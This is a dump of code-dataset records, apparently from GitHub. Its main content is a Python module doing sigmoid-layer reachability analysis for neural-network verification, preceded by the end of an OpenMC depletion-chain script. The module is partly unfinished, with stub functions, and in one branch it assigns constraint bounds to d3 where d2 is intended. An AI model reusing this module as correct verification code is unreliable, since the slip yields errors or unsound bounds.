== 3:\n file_obj = StringIO(evaluation.section[3, mt])\n openmc.data.endf.get_head_record(file_obj)\n q_value = openmc.data.endf.get_cont_record(file_obj)[1]\n reactions[nuc_name][mt] = q_value\n\n # Determine what decay and FPY nuclides are available\n print('Processing decay sub-library files...')\n decay_data = {}\n all_decay_data = {}\n for f in decay_files:\n decay_obj = openmc.data.Decay(f)\n nuc_name = decay_obj.nuclide['name']\n all_decay_data[nuc_name] = decay_obj\n if nuc_name in CASL_CHAIN:\n decay_data[nuc_name] = decay_obj\n\n for nuc_name in CASL_CHAIN:\n if nuc_name not in decay_data:\n print('WARNING: {} has no decay data!'.format(nuc_name))\n\n print('Processing fission product yield sub-library files...')\n fpy_data = {}\n for f in fpy_files:\n fpy_obj = openmc.data.FissionProductYields(f)\n name = fpy_obj.nuclide['name']\n if name in CASL_CHAIN:\n fpy_data[name] = fpy_obj\n\n print('Creating depletion_chain...')\n missing_daughter = []\n missing_rx_product = []\n missing_fpy = []\n\n for idx, parent in enumerate(sorted(decay_data, key=openmc.data.zam)):\n data = decay_data[parent]\n\n nuclide = Nuclide(parent)\n\n chain.nuclides.append(nuclide)\n chain.nuclide_dict[parent] = idx\n\n if not CASL_CHAIN[parent][0] and \\\n not data.nuclide['stable'] and data.half_life.nominal_value != 0.0:\n nuclide.half_life = data.half_life.nominal_value\n nuclide.decay_energy = data.decay_energy.nominal_value\n nuclide.sources = data.sources\n sum_br = 0.0\n for mode in data.modes:\n decay_type = ','.join(mode.modes)\n if mode.daughter in decay_data:\n target = mode.daughter\n else:\n missing_daughter.append((parent, mode))\n continue\n\n # Append decay mode\n br = mode.branching_ratio.nominal_value\n nuclide.add_decay_mode(decay_type, target, br)\n\n # Ensure sum of branching ratios is unity by slightly modifying last\n # value if necessary\n sum_br = sum(m.branching_ratio for m in nuclide.decay_modes)\n if sum_br != 1.0 and nuclide.decay_modes and parent not in UNMODIFIED_DECAY_BR:\n decay_type, target, br = nuclide.decay_modes.pop()\n br = 1.0 - sum(m.branching_ratio for m in nuclide.decay_modes)\n nuclide.add_decay_mode(decay_type, target, br)\n\n # If nuclide has incident neutron data, we need to list what\n # transmutation reactions are possible\n fissionable = False\n transmutation_reactions = ('(n,2n)', '(n,3n)', '(n,4n)', '(n,gamma)',\n '(n,p)', '(n,a)')\n if parent in reactions:\n reactions_available = reactions[parent].keys()\n for name in transmutation_reactions:\n mts, changes, _ = REACTIONS[name]\n if mts & reactions_available:\n delta_A, delta_Z = changes\n A = data.nuclide['mass_number'] + delta_A\n Z = data.nuclide['atomic_number'] + delta_Z\n daughter = '{}{}'.format(openmc.data.ATOMIC_SYMBOL[Z], A)\n\n if daughter not in decay_data:\n daughter = replace_missing_decay_product(\n daughter, decay_data, all_decay_data)\n if daughter is None:\n missing_rx_product.append((parent, name, daughter))\n\n # Store Q value -- use sorted order so we get summation\n # reactions (e.g., MT=103) first\n for mt in sorted(mts):\n if mt in reactions[parent]:\n q_value = reactions[parent][mt]\n break\n else:\n q_value = 0.0\n\n nuclide.add_reaction(name, daughter, q_value, 1.0)\n\n # Check for fission reactions\n if any(mt in reactions_available for mt in [18, 19, 20, 21, 38]):\n q_value = reactions[parent][18]\n nuclide.add_reaction('fission', None, q_value, 1.0)\n fissionable = True\n\n if fissionable:\n if parent in fpy_data:\n fpy = fpy_data[parent]\n else:\n nuclide._fpy = replace_missing_fpy(parent, fpy_data, decay_data)\n missing_fpy.append((parent, nuclide._fpy))\n continue\n\n if fpy.energies is not None:\n yield_energies = fpy.energies\n else:\n yield_energies = [0.0]\n\n yield_data = {}\n for E, table_yd, table_yc in zip(yield_energies, fpy.independent, fpy.cumulative):\n yields = defaultdict(float)\n for product in table_yd:\n if product in decay_data:\n # identifier\n ifpy = CASL_CHAIN[product][2]\n # 1 for independent\n if ifpy == 1:\n if product not in table_yd:\n print('No independent fission yields found for {} in {}'.format(product, parent))\n else:\n yields[product] += table_yd[product].nominal_value\n # 2 for cumulative\n elif ifpy == 2:\n if product not in table_yc:\n print('No cumulative fission yields found for {} in {}'.format(product, parent))\n else:\n yields[product] += table_yc[product].nominal_value\n # 3 for special treatment with weight fractions\n elif ifpy == 3:\n for name_i, weight_i, ifpy_i in CASL_CHAIN[product][3]:\n if name_i not in table_yd:\n print('No fission yields found for {} in {}'.format(name_i, parent))\n else:\n if ifpy_i == 1:\n yields[product] += weight_i * table_yd[name_i].nominal_value\n elif ifpy_i == 2:\n yields[product] += weight_i * table_yc[name_i].nominal_value\n\n yield_data[E] = yields\n\n nuclide.yield_data = FissionYieldDistribution(yield_data)\n\n # Replace missing FPY data\n for nuclide in chain.nuclides:\n if hasattr(nuclide, '_fpy'):\n nuclide.yield_data = chain[nuclide._fpy].yield_data\n\n # Display warnings\n if missing_daughter:\n print('The following decay modes have daughters with no decay data:')\n for parent, mode in missing_daughter:\n print(' {} -> {} ({})'.format(parent, mode.daughter, ','.join(mode.modes)))\n print('')\n\n if missing_rx_product:\n print('The following reaction products have no decay data:')\n for vals in missing_rx_product:\n print('{} {} -> {}'.format(*vals))\n print('')\n\n if missing_fpy:\n print('The following fissionable nuclides have no fission product yields:')\n for parent, replacement in missing_fpy:\n print(' {}, replaced with {}'.format(parent, replacement))\n print('')\n\n chain.export_to_xml('chain_casl.xml')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"openmc-dev/data","sub_path":"depletion/generate_endf71_chain_casl.py","file_name":"generate_endf71_chain_casl.py","file_ext":"py","file_size_in_byte":10999,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"23046665047","text":"#!/usr/bin/python3\nimport numpy as np\n\nclass LogSig:\n # LogSig class contains method for reachability analysis for Layer with\n # Sigmoid activation function.\n # Reference: https://www.mathworks.com/help/deeplearning/ref/logsig.html\n\n def evaluate(x):\n return 1 / (1 + np.exp(-x)) # np.exp(-np.logaddexp(0, -x)) check if it is more accurate\n\n # main method\n def reach_star_approx(I, # input star set\n method = 'approx-star-no-split', # reach star approximate method \n relaxFactor = 0, # for relaxed approx-star method\n disp_opt = '', # display option\n lp_solver = 'gurobi'): # lp solver option\n from engine.set.star import Star\n \n assert isinstance(I, Star), 'error: input set is not a star set'\n\n if method == 'approx-star-no-split' or method == 'approx-star':\n if relaxFactor == 0:\n S = LogSig.multiStepLogSig_NoSplit(I, disp_opt, lp_solver)\n else:\n S = LogSig.relaxedMultiStepLogSig_NoSplit(I, relaxFactor, disp_opt, lp_solver)\n elif method == 'approx-star-split':\n S = LogSig.reach_star_approx_split(I)\n else:\n raise Exception('error: unkown reachability method')\n return S\n\n#------------------check if this function is working--------------------------------------------\n # reachability method with star\n # def reach_star_approx_split(I):\n\n #------------------check if this function is working--------------------------------------------\n # def stepLogSig_Split(I, index):\n\n # multiStepLogSig at one\n def multiStepLogSig_NoSplit(I, disp_opt = '', lp_solver = 'gurobi'):\n # @I: input star set\n # @l: l = min(x[index]), lower bound at neuron x[index]\n # @u: u = max(x[index]), upper bound at neuron x[index]\n # @yl: yl = tansig(l), output of logsig at lower bound\n # @yu: yu = tansig(u), output of logsig at upper bound\n # @dyl: derivative of TanSig at the lower bound\n # @dyu: derivative of TanSig at the upper bound\n # return: output star set\n from engine.set.star import Star\n\n assert isinstance(I, Star), 'error: input set is not a star'\n\n N = I.dim\n inds = np.array(range(N))\n disp = disp_opt == 'display'\n if disp:\n print('\\nComputing lower-bounds: ')\n l = I.getMins(inds, '', disp_opt, lp_solver)\n if disp: \n print('\\nComputing upper-bounds: ')\n u = I.getMaxs(inds, '', disp_opt, lp_solver)\n \n yl = LogSig.evaluate(l)\n yu = LogSig.evaluate(u)\n dyl = yl * (1 - yl)\n dyu = yu * (1 - yu)\n\n # l ~= u\n map2 = np.argwhere(l.flatten() != u.flatten())\n m = len(map2)\n V2 = np.zeros((N,m))\n for i in range(m):\n V2[map2[i], i] = 1\n\n # new basis matrix\n new_V = np.hstack((np.zeros((N, I.nVar+1)), V2))\n \n # l == u\n map1 = np.argwhere(l.flatten() == u.flatten())\n if len(map1):\n yl1 = yl[map1]\n new_V[map1, 0] = yl1\n new_V[map1, 1:I.nVar+1+m] = 0\n\n # add new constraints\n \n # C0, d0\n n = I.C.shape[0]\n C0 = np.hstack((I.C, np.zeros((n,m))))\n d0 = I.d\n\n nv = I.nVar+1\n\n # C1, d1, x >= 0\n # constraint 1: y <= y'(l) * (x - l) + y(l)\n # constarint 2: y <= y'(u) * (x - u) + y(u) \n # constraint 3: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n map1 = np.argwhere((l.flatten() >= 0) & (l.flatten() != u.flatten()))\n if len(map1):\n a = yl[map1]\n b = yu[map1]\n da = dyl[map1]\n db = dyu[map1]\n # constraint 1: y <= y'(l) * (x - l) + y(l)\n C11 = np.hstack((np.multiply(-da, I.V[map1, 1:nv]), V2[map1, :]))\n d11 = np.multiply(da, I.V[map1, 0] - l[map1]) + a\n # constarint 2: y <= y'(u) * (x - u) + y(u)\n C12 = np.hstack((np.multiply(-db, I.V[map1, 1:nv]), V2[map1, :]))\n d12 = np.multiply(db, I.V[map1, 0] - u[map1]) + b\n # constraint 3: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n gamma = (b-a)/(u[map1] - l[map1])\n C13 = np.hstack((np.multiply(gamma, I.V[map1, 1:nv]), -V2[map1, :]))\n d13 = np.multiply(-gamma, I.V[map1, 0] - l[map1]) - a\n\n C1 = np.vstack((C11, C12, C13))\n d1 = np.vstack((d11, d12, d13))\n else:\n C1 = np.empty((0, nv+1))\n d1 = np.empty((0, 1))\n\n # C2, d2, x <= 0\n # y is concave when x <= 0\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n # constraint 2: y >= y'(u) * (x - u) + y(u)\n # constraint 3: y <= (y(u) - y(l)) * (x -l) / (u - l) + y(l)\n map1 = np.argwhere((u.flatten() <= 0) & (l.flatten() != u.flatten()))\n if len(map1):\n a = yl[map1]\n b = yu[map1]\n da = dyl[map1]\n db = dyu[map1]\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n C21 = np.hstack((np.multiply(da, I.V[map1, 1:nv]), -V2[map1, :]))\n d21 = np.multiply(-da, I.V[map1, 0]-l[map1]) - a\n # constraint 2: y >= y'(u) * (x - u) + y(u)\n C22 = np.hstack((np.multiply(db, I.V[map1, 1:nv]), -V2[map1, :]))\n d22 = np.multiply(-db, I.V[map1, 0]-u[map1]) - b\n # constraint 3: y <= (y(u) - y(l)) * (x -l) / (u - l) + y(l)\n gamma = (b-a)/(u[map1] - l[map1])\n C23 = np.hstack((np.multiply(-gamma, I.V[map1, 1:nv]), V2[map1, :]))\n d23 = np.multiply(gamma, I.V[map1, 0]-l[map1]) + a\n\n C2 = np.vstack((C21, C22, C23))\n d3 = np.vstack((d21, d22, d23))\n else:\n C2 = np.empty((0, nv+1))\n d2 = np.empty((0, 1))\n\n # C3, d3, l< 0 and u > 0, x > 0 or x < 0\n # y is concave for x in [l, 0] and convex for x\n # in [0, u]\n # split can be done here\n map1 = np.argwhere((l.flatten() < 0) & (u.flatten() > 0)).flatten()\n if len(map1):\n a = yl[map1]\n b = yu[map1]\n da = dyl[map1]\n db = dyu[map1]\n\n dmin = np.minimum(da, db)\n # over-approximation constraints\n # constraint 1: y >= min(y'(l), y'(u)) * (x - l) + y(l)\n # constraint 2: y <= min(y'(l), y'(u)) * (x - u) + y(u)\n # constraint 3: y <= g2 * x + y2\n # constraint 4: y >= g1 * x + y1\n\n # constraint 1: y >= min(y'(l), y'(u)) * (x - l) + y(l)\n C31 = np.hstack((np.multiply(dmin, I.V[map1, 1:nv]), -V2[map1, :]))\n d31 = np.multiply(-dmin, I.V[map1, 0]-l[map1]) - a\n # constraint 2: y <= min(y'(l), y'(u)) * (x - u) + y(u)\n C32 = np.hstack((np.multiply(-dmin, I.V[map1, 1:nv]), V2[map1, :]))\n d32 = np.multiply(dmin, I.V[map1, 0]-u[map1]) + b\n\n dmin = np.minimum(da, db)\n y1 = dmin*(-l[map1]) + a\n y2 = dmin*(-u[map1]) + b\n g2 = (y2 - a)/(-l[map1])\n g1 = (y1 - b)/(-u[map1])\n\n # print('l: ', l[map1])\n # print('u: ', [map1])\n # print('y1: ', y1)\n # print('y2: ', y2)\n # print('g1: ', g1)\n # print('g2: ', g2)\n\n\n # constraint 3: y <= g2 * x + y2\n C33 = np.hstack((np.multiply(-g2,I.V[map1, 1:nv]), V2[map1, :]))\n d33 = np.multiply(g2, I.V[map1, 0]) + y2\n # constraint 4: y >= g1 * x + y1\n C34 = np.hstack((np.multiply(g1,I.V[map1, 1:nv]), -V2[map1, :]))\n d34 = np.multiply(-g1, I.V[map1, 0]) - y1\n\n # print('C31: \\n', C31)\n # print('C32: \\n', C32)\n # print('C33: \\n', C33)\n # print('C34: \\n', C34)\n # print('d31: \\n', d31)\n # print('d32: \\n', d32)\n # print('d33: \\n', d33)\n # print('d34: \\n', d34)\n C3 = np.vstack((C31, C32, C33, C34))\n d3 = np.vstack((d31, d32, d33, d34))\n # print('C3: \\n', C3)\n # print('d3: \\n', d3)\n else:\n # C3 = np.array([])\n # d3 = np.array([])\n C3 = np.empty((0, nv+1))\n d3 = np.empty((0, 1))\n\n # print('C1: \\n', C1)\n # print('C2: \\n', C2)\n # print('C3: \\n', C3)\n # print('d1: \\n', d1)\n # print('d2: \\n', d2)\n # print('d3: \\n', d3)\n new_C = np.vstack((C0, C1, C2, C3))\n new_d = np.vstack((d0, d1, d2, d3))\n\n # print('new_C: \\n', new_C)\n # print('new_d: \\n', new_d)\n\n # print('I.predicate_lb: ', I.predicate_lb)\n # print('I.predicate_ub: ', I.predicate_ub)\n # print('yl[map2]: ', yl[map2.flatten()])\n # print('yu[map2]: ', yu[map2.T])\n new_pred_lb = np.vstack((I.predicate_lb, yl[map2.flatten()]))\n new_pred_ub = np.vstack((I.predicate_ub, yu[map2.flatten()]))\n\n return Star(new_V, new_C, new_d, new_pred_lb, new_pred_ub)\n\n#------------------check if this function is working--------------------------------------------\n # def relaxedMultiStepLogSig_NoSplit(I, relaxFactor = 0, disp_opt = '', lp_solver = 'gurobi'):\n # # @I: input star set\n # # @relaxFactor: for relaxed approx-star method\n # # @dis_opt; display option = '' or 'display'\n\n # # @l: l = min(x[index]), lower bound at neuron x[index]\n # # @u: u = min(x[index]), upper bound at neuron x[index]\n # # @yl: = logsig(l); output of logsig at lower bound\n # # @yu: = logsig(u); output of logsig at upper bound\n # # @dyl: derivative of LogSig at the lower bound\n # # @dyu: derivative of LogSig at the upper bound\n\n\n def reach_rstar_approx(I):\n # @I: input RStar set\n # return: output RStar set\n from engine.set.rstar import RStar\n \n assert isinstance(I, RStar), 'error: input set is not a RStar set'\n\n # LogSig.multiLogSig_rstar(I)\n\n D_L = I.D_L\n D_U = I.D_U\n lb = I.lb\n ub = I.ub\n n = len(D_L) - 1\n\n l = lb[n]\n u = ub[n]\n\n y_l = LogSig.evaluate(l)\n y_u = LogSig.evaluate(u)\n dy_l = (y_l * (1 - y_l.T)).diagonal().reshape(-1,1)\n dy_u = (y_u * (1 - y_u.T)).diagonal().reshape(-1,1)\n\n # create new matrices for lower and uppper polyhedral constraints and bounds\n D_L.append(np.zeros((I.dim, I.dim + 1)))\n D_U.append(np.zeros((I.dim, I.dim + 1)))\n lb.append(np.zeros((I.dim, 1)))\n ub.append(np.zeros((I.dim, 1)))\n RS = RStar(I.V, I.C, I.d, I.predicate_lb, I.predicate_ub, D_L, D_U, lb, ub, I.iter)\n\n for i in range(I.dim):\n RS = LogSig.stepLogSig_rstar(RS, i, l[i], u[i], y_l[i], y_u[i], dy_l[i], dy_u[i])\n return RS\n\n def stepLogSig_rstar(I, index, l, u, y_l, y_u, dy_l, dy_u):\n # @I: rstar-input set\n # @index: index of neuron performing stepReach\n # @l: l = min(x[index]), lower bound at neuron x[index] \n # @u: u = max(x[index]), upper bound at neuron x[index]\n # @y_l: = logsig(l); output of logsig at lower bound\n # @y_u: = logsig(u); output of logsig at upper bound\n # @dy_l: derivative of LogSig at the lower bound\n # @dy_u: derivative of LogSig at the upper bound\n # return: RStar output set\n from engine.set.rstar import RStar\n\n assert isinstance(I, RStar), 'error: input set is not a RStar set'\n \n D_L = I.D_L\n D_U = I.D_U\n lb = I.lb\n ub = I.ub\n n = len(D_L) - 1\n\n if l == u:\n new_V = I.V\n new_V[index, :] = 0\n new_V[index, 0] = y_l\n\n L = np.zeros((1, I.dim + 1))\n L[index + 1] = y_l\n D_L[n][index, :] = L\n\n U = np.zeros((1, I.dim + 1))\n U[index + 1] = y_l\n D_U[n][index, :] = U\n\n lb[n][index] = y_l\n ub[n][index] = y_u\n\n return RStar(new_V, I.C, I.d, I.predicate_lb, I.predicate_ub, D_L, D_U, lb, ub, I.iter)\n else:\n # print('I: \\n', I)\n # print('I.V: \\n', I.V)\n # print(' np.zeros((I.dim, 1)): \\n', np.zeros((I.dim, 1)))\n # print('I.C: \\n', I.C)\n # print('np.zeros((I.C.shape[0], 1)): \\n', np.zeros((I.C.shape[0], 1)))\n new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n new_V[index, :] = 0\n new_V[index, -1] = 1\n\n C0 = np.column_stack((I.C, np.zeros((I.C.shape[0], 1))))\n d0 = I.d\n\n if l >= 0:\n a = (y_u - y_l)/(u - l)\n\n # constraint 1: y[index] >= y(l) + a * (x[index] - l)\n L = np.zeros(I.dim + 1).T\n L[0] = y_l - a * l\n L[index + 1] = a\n D_L[n][index, :] = L\n\n C1 = np.column_stack((a*I.V[index, 1:], -1))\n d1 = -y_l - a * (I.V[index, 0] - l)\n\n # constraint 2: y[index] <= y(u) + y'(u) * (x[index] - u)\n U = np.zeros(I.dim + 1).T\n U[0] = y_l - dy_u * u\n U[index + 1] = dy_u\n D_U[n][index, :] = U\n\n C2 = np.column_stack((-dy_u*I.V[index, 1:], 1))\n d2 = y_u + dy_u * (I.V[index, 0] - u)\n elif u <= 0:\n a = (y_u - y_l)/(u - l)\n\n # constraint 1: y[index] >= y(l) + y'(l) * (x[index] - l)\n L = np.zeros(I.dim + 1).T\n L[0] = y_l - dy_l * l\n L[index + 1] = dy_l\n D_L[n][index, :] = L\n\n C1 = np.column_stack((dy_l*I.V[index, 1:], -1))\n d1 = -y_l - dy_l * (I.V[index, 0] - l)\n\n # constraint 2: y[index] <= y(l) + a * (x[index] - l)\n U = np.zeros(I.dim + 1).T\n U[0] = y_l - a * l\n U[index + 1] = a\n D_U[n][index, :] = U\n \n C2 = np.column_stack((-a * I.V[index, 1:], 1))\n d2 = y_l + a * (I.V[index, 0] - l)\n else:\n da = min(dy_l, dy_u)\n\n # constraint 1: y[index] >= y(l) + da * (x[index] - l)\n L = np.zeros(I.dim + 1).T\n L[0] = y_l - da * l\n L[index + 1] = da\n D_L[n][index, :] = L\n \n C1 = np.column_stack((da*I.V[index, 1:], -1))\n d1 = -y_l - da * (I.V[index, 0] - l)\n\n # constraint 2: y[index] <= y(u) + lamda' * (x[index] - u)\n U = np.zeros(I.dim + 1).T\n U[0] = y_u - da * u\n U[index + 1] = da\n D_U[n][index, :] = U\n\n C2 = np.column_stack((-da*I.V[index, 1:], 1))\n d2 = y_u + da * (I.V[index, 0] - u)\n\n\n lb[n][index] = y_l\n ub[n][index] = y_u\n\n new_C = np.row_stack((C0, C1, C2))\n new_d = np.row_stack((d0, d1, d2))\n\n new_pred_lb = np.vstack((I.predicate_lb, y_l)) \n new_pred_ub = np.vstack((I.predicate_ub, y_u))\n\n return RStar(new_V, new_C, new_d, new_pred_lb, new_pred_ub, D_L, D_U, lb, ub, I.iter)\n\n # def multistepLogSig_rstar(I):\n # # @I: input RStar set\n # # return: output RStar set\n # from engine.set.rstar import RStar\n \n # assert isinstance(I, RStar), 'error: input set is not a RStar set'\n\n # N = I.dim\n # nVar = I.V.shape[1]\n\n # D_L = I.D_L\n # D_U = I.D_U\n # lb = I.lb\n # ub = I.ub\n # n = len(D_L) - 1\n\n # l = lb[n]\n # u = ub[n]\n\n # y_l = LogSig.evaluate(l)\n # y_u = LogSig.evaluate(u)\n # dy_l = (y_l * (1 - y_l.T)).diagonal().reshape(-1,1)\n # dy_u = (y_u * (1 - y_u.T)).diagonal().reshape(-1,1)\n\n # # create new matrices for lower and uppper polyhedral constraints and bounds\n # D_L.append(np.zeros((I.dim, I.dim + 1)))\n # D_U.append(np.zeros((I.dim, I.dim + 1)))\n # lb.append(np.zeros((I.dim, 1)))\n # ub.append(np.zeros((I.dim, 1)))\n\n # # l ~= u\n # map2 = np.argwhere(l.flatten() != u.flatten())\n # m = len(map2)\n # V2 = np.zeros((N,m))\n # for i in range(m):\n # V2[map2[i], i] = 1\n\n # # new basis matrix\n # new_V = np.hstack((np.zeros((N, I.nVar+1)), V2))\n\n # # l == u\n # map1 = np.argwhere(l.flatten() == u.flatten())\n # if len(map1):\n # yl1 = y_l[map1]\n # new_V[map1, 0] = yl1\n # new_V[map1, 1:nVar+1+m] = 0\n\n\n # # add new constraints\n \n # # C0, d0\n # n = I.C.shape[0]\n # C0 = np.hstack((I.C, np.zeros((n,m))))\n # d0 = I.d\n\n # nv = nVar+1\n\n # # C1, d1, x >= 0\n # # constraint 1: y >= y(l) + a * (x- l)\n # # constraint 2: y <= y(u) + y'(u) * (x- u)\n # map1 = np.argwhere((l.flatten() >= 0) & (l.flatten() != u.flatten()))\n # if len(map1):\n\n\n\n # a = (y_u - y_l)/(u - l)\n\n # # constraint 1: y[index] >= y(l) + a * (x[index] - l)\n # L = np.zeros(I.dim + 1).T\n # L[0] = y_l - a * l\n # L[index + 1] = a\n # D_L[n][index, :] = L\n\n # C1 = np.column_stack((a*I.V[index, 1:], -1))\n # d1 = -y_l - a * (I.V[index, 0] - l)\n\n # # constraint 2: y[index] <= y(u) + y'(u) * (x[index] - u)\n # U = np.zeros(I.dim + 1).T\n # U[0] = y_l - dy_u * u\n # U[index + 1] = dy_u\n # D_U[n][index, :] = U\n\n # C2 = np.column_stack((-dy_u*I.V[index, 1:], 1))\n # d2 = y_u + dy_u * (I.V[index, 0] - u) \n # else:\n # C1 = np.empty((0, nv+1))\n # d1 = np.empty((0, 1))\n\n # # C2, d2, x <= 0\n\n\n # # C3, d3, l< 0 and u > 0, x > 0 or x < 0\n\n\n # RS = RStar(I.V, I.C, I.d, D_L, D_U, lb, ub, I.iter)\n\n # for i in range(I.dim):\n # RS = LogSig.stepLogSig_rstar(RS, i, l[i], u[i], y_l[i], y_u[i], dy_l[i], dy_u[i])\n # return RS\n\n\n\n # return\n\n #-------------------------------- over-approximate reachability analysis with zonotope -----------------------------------#\n # rechability analysis with zonotope\n def reach_zono_approx(I):\n # @I: input zono\n # return: Z: output zono\n \n # method: approximate hyperbolic tangent function by a zonotope:\n # reference: Fast and Effective Robustness Certification,\n # Gagandeep Singh, NIPS, 2018\n from engine.set.zono import Zono\n\n assert isinstance(I, Zono), 'error: input set is not a Zono'\n\n B = I.getBox()\n lb = B.lb\n ub = B.ub\n print('lb: \\n', lb)\n print('ub: \\n', ub)\n y_lb = LogSig.evaluate(lb)\n y_ub = LogSig.evaluate(ub)\n dy_lb = y_lb * (1 - y_lb)\n dy_ub = y_ub * (1 - y_ub)\n\n G = np.hstack((dy_lb, dy_ub))\n gamma_mat = np.matrix(np.diagflat(G.min(1)))\n mu1 = 0.5 * (y_ub + y_lb - gamma_mat * (ub + lb))\n mu2 = 0.5 * (y_ub - y_lb - gamma_mat * (ub - lb))\n Z1 = I.affineMap(gamma_mat, mu1)\n new_V = np.diagflat(mu2)\n\n V = np.hstack((Z1.V, new_V))\n return Zono(Z1.c, V)\n\n#------------------check if this function is working--------------------------------------------\n # dealing with multiple inputs in parallel\n # def reach_zono_approx_multipleInputs(I, parallel = ''):\n\n\n #-------------------------------- over-approximate reachability analysis with abstract domain -----------------------------------#\n def stepLogSig_absdom(I, index, l, u, y_l, y_u, dy_l, dy_u):\n # @I: input star set\n # @index: index of the neuron\n # @l: l = min(x[index]); lower bound at neuron x[index]\n # @u: u = min(x[index]); upper bound at neuron x[index]\n # @y_l: y_l = logsig(l); output of logsig at lower bound\n # @y_u: y_u = logsig(u); output of logsig at upper bound\n # return: output star set\n from engine.set.star import Star\n\n if l == u:\n new_V = I.V\n new_V[index, :] = 0\n new_V[index, 0] = y_l\n return Star(new_V, I.C, I.predicate_lb, I.predicate_ub)\n\n elif l >= 0:\n # y is convex when x >= 0\n # constraint 1: y <= y'(u) * (x - u) + y(u)\n # constraint 2: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n\n n = I.nVar + 1\n # over-approximation constraints\n # constraint 1: y <= y'(u) * (x - u) + y(u)\n C1 = np.column_stack((-dy_u*I.V[index, 1:n], 1))\n d1 = dy_u * I.V[index, 0] - dy_u*u + y_u\n # constraint 2: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n a = (y_u - y_l) / (u - l)\n C2 = np.column_stack((a*I.V[index, 1:n], -1))\n d2 = a*l - y_l - a*I.V[index, 0]\n\n m = I.C.shape[0]\n C0 = np.column_stack((I.C, np.zeros((m, 1))))\n d0 = I.d\n new_C = np.row_stack((C0, C1, C2))\n new_d = np.row_stack((d0, d1, d2))\n new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n new_V[index, :] = np.zeros((1, n+1))\n new_V[index, n] = 1\n\n # update predicate bound\n new_predicate_lb = np.row_stack((I.predicate_lb, y_l))\n new_predicate_ub = np.row_stack((I.predicate_ub, y_u))\n return Star(new_V, new_C, new_d, new_predicate_lb, new_predicate_ub)\n \n elif u <= 0:\n # y is concave when x <= 0\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n # constraint 2: y <= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n\n n = I.nVar + 1\n # over-approximation constraints\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n C1 = np.column_stack((dy_l*I.V[index, 1:n], -1))\n d1 = -dy_l * I.V[index, 0] + dy_l*l - y_l\n # constraint 2: y <= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n a = (y_u - y_l)/(u - l)\n C2 = np.column_stack((-a*I.V[index, 1:n], 1)) \n d2 = -a*l + y_l + a*I.V[index, 0]\n\n m = I.C.shape[0]\n C0 = np.column_stack((I.C, np.zeros((m, 1))))\n d0 = I.d\n new_C = np.row_stack((C0, C1, C2))\n new_d = np.row_stack((d0, d1, d2))\n new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n new_V[index, :] = np.zeros((1, n+1))\n new_V[index, n] = 1\n\n # update predicate bound\n new_predicate_lb = np.row_stack((I.predicate_lb, y_l))\n new_predicate_ub = np.row_stack((I.predicate_ub, y_u))\n return Star(new_V, new_C, new_d, new_predicate_lb, new_predicate_ub)\n\n elif l < 0 and u > 0:\n # over-approximation constraints \n # constraint 1: y >= y'(l) * (x - l) + y(l)\n # constraint 2: y <= y'(u) * (x - u) + y(u)\n\n n = I.nVar + 1\n\n dy_min = min(dy_l, dy_u)\n # constraint 1: y >= y'(l) * (x - l) + y(l)\n C1 = np.column_stack((dy_min*I.V[index, 1:n], -1))\n d1 = -dy_min * I.V[index, 0] + dy_min*l - y_l\n # constraint 2: y <= y'(u) * (x - u) + y(u)\n C2 = np.column_stack((-dy_min*I.V[index, 1:n], 1))\n d2 = dy_min * I.V[index, 0] - dy_min*u + y_u\n\n m = I.C.shape[0]\n C0 = np.column_stack((I.C, np.zeros((m, 1))))\n d0 = I.d\n new_C = np.row_stack((C0, C1, C2))\n new_d = np.row_stack((d0, d1, d2))\n new_V = np.column_stack((I.V, np.zeros((I.dim, 1))))\n new_V[index, :] = np.zeros((1, n+1))\n new_V[index, n] = 1\n\n # update predicate bound\n new_predicate_lb = np.row_stack((I.predicate_lb, y_l))\n new_predicate_ub = np.row_stack((I.predicate_ub, y_u))\n return Star(new_V, new_C, new_d, new_predicate_lb, new_predicate_ub)\n\n # reachability analysis with abstract domain\n def reach_absdom_approx(I):\n # @I: input star set\n # return: soutput star set\n\n # reference: An abstract domain for certifying neural networks. Proceedings of the ACM on Programming Languages,\n # Gagandeep Singh, POPL, 2019\n from engine.set.star import Star\n\n assert isinstance(I, Star), 'error: input set is not a Star'\n\n [l, u] = I.estimateRanges()\n\n y_l = LogSig.evaluate(l)\n y_u = LogSig.evaluate(u)\n dy_l = (y_l * (1 - y_l.T)).diagonal().reshape(-1,1)\n dy_u = (y_u * (1 - y_u.T)).diagonal().reshape(-1,1)\n\n n = I.dim\n S = I\n for i in range(n):\n S = LogSig.stepLogSig_absdom(S, i, l[i], u[i], y_l[i], y_u[i], dy_l[i], dy_u[i])\n return S\n\n # main function for reachability analysis\n def reach(I, # an input star set\n method, # 'approx-star', 'approx-zono', or 'abs-dom'\n option = '', # = 'parallel' or '' using parallel computation or not\n relaxFactor = 0, # for relaxed approx-star method \n disp_opt = '', \n lp_solver = 'gurobi'):\n\n if method == 'approx-star': # exact analysis using star\n return LogSig.reach_star_approx(I, method, relaxFactor, disp_opt, lp_solver)\n elif method == 'approx-rstar':\n return LogSig.reach_rstar_approx(I)\n elif method == 'approx-zono': # over-approximate analysis using zonotope\n return LogSig.reach_zono_approx(I)\n elif method == 'abs-dom': # over-approximate analysis using abstrac-domain method of star\n return LogSig.reach_absdom_approx(I)\n else:\n raise Exception('error: unknown or unsupported reachability method for layer with TanSig activation function')","repo_name":"V2A2/StarV_temp","sub_path":"engine/nn/funcs/logsig/logsig.py","file_name":"logsig.py","file_ext":"py","file_size_in_byte":25978,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30473378492","text":"import numpy as np\n\nmatrix = np.array([\n [1,2,4],\n [0,1,-1],\n [2,0,-4],\n [3,-5,1]\n])\n\nprices 